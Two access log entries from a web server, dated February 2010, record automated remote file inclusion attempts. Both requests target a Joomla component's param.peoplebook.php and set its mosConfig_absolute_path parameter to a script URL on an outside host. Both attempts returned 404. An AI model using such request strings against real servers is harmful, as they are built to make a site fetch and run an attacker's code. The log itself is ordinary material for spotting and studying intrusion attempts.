219.94.194.248 - - [12/Feb/2010:09:23:56 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:09:23:58 -0800] "GET /logs/access_100119.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
